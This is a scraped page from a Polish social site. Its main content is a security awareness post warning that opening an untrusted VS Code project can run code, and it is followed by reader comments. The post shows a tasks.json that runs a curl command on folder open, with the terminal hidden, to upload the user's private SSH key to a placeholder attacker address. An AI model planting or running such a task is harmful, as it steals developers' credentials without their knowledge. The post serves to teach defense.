Aktywne Wpisy
Poleci ktoś jakąś fajną gierkę, która nie będzie miała w sobie z-------o otwartego świata z misjami pobocznymi, masą rpgowych rzeczy, opcji dialogowych do wyboru i masę cutscenek. Skończyło się na tym, że ogrywam sobie serie Portal i Half life po raz 5 bo nie ma w co grać. Jak próbowałem grać w coś pokroju wiedźmina czy skyrima to mnie normalnie telepało na krześle z tego jakie te gry są nudne.
Uwielbiam Portale,
Uwielbiam Portale,
No to zaczynamy to co tygryski lubią najbardziej, czyli żużlowy sezon 2026!
Zapraszam do typowania pierwszej kolejki PGE Ekstraligi!
Unia Leszno - Włókniarz Częstochowa
Sparta Wrocław - Falubaz Zielona Góra
GKM Grudziądz - Stal Gorzów
Zapraszam do typowania pierwszej kolejki PGE Ekstraligi!
Unia Leszno - Włókniarz Częstochowa
Sparta Wrocław - Falubaz Zielona Góra
GKM Grudziądz - Stal Gorzów
źródło: TyperŻużlowy2026
Pobierz
Aktywne Znaleziska
TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk
Yes, I Trust- potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.Projekt w Visual Studio Code może posiadać specjalny plik
.vscode/tasks.json. Dla przykładu:{"version": "2.0.0",
"tasks": [
{
"label": "Uruchom testy",
"type": "shell",
"group": "test",
"command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "never",
"panel": "new",
}
}
]
}
Ukradnie klucz prywatny użytkownika Kacper i wyśle go do serwera atakującego.
"runOn": "folderOpen"- Nasze zadanie zostanie uruchomione automatycznie, zaraz po otworzeniu projektu."reveal": "never"- Ta opcja sprawia, że użytkownikowi nie wyświetli się okno terminala.Czy takie ataki są popularne? NIE.
Czy się zdarzają? TAK.
Więcej zobaczysz na YouTube lub na blogu.
Interesujesz się bezpieczeństwem? Sprawdź mój kurs Bezpieczny Programista.
#programowanie #programista15k #gruparatowaniapoziomu #technologia #ciekawostki #bezpieczenstwo #informatyka #komputery #nauka
Imho warto tu dodać, że ataki celowane w programistów stają się coraz bardziej popularne więc ten zapis może się zmienić ( ͡º ͜ʖ͡º)
@KacperSzurek:
To nie jest żaden specjalny plik, tylko definicje zadań do automatyzacji.
Po
@kot_gagarina: Popraweczka do punktu 2. Kod może faktycznie odpalić się w vsc "automatycznie". W tasks.json można zauważyć, wpisy runOn: folderOpen oraz "reveal": "never". Pierwsze odpala skrypt po otworzeniu folderu, drugie odpala skrypt, bez tworzenia okna terminala.
Kiedyś to było, a teraz to nie ma ( ͡° ͜ʖ ͡°)
No i nie porównuj notatnika czy Windowsa do Emacsa, powiedz mi czy Windows ma psychoterapię? A Emacs ma pod komendą doctor ( ͡° ͜ʖ ͡°)
@mvmxks: Windows ma całą procedurę: "Rozwiąż Problem"!!!
A co do emacsa, to starsi pamiętają, jakie potrafi stanowić zagrożenie (zwłaszcza w połączeniu
Nie jestem w stanie tego znaleźć teraz, skasowałeś wpis? jeśli nie, to może byś mógł podlinkować? z góry dziękuje.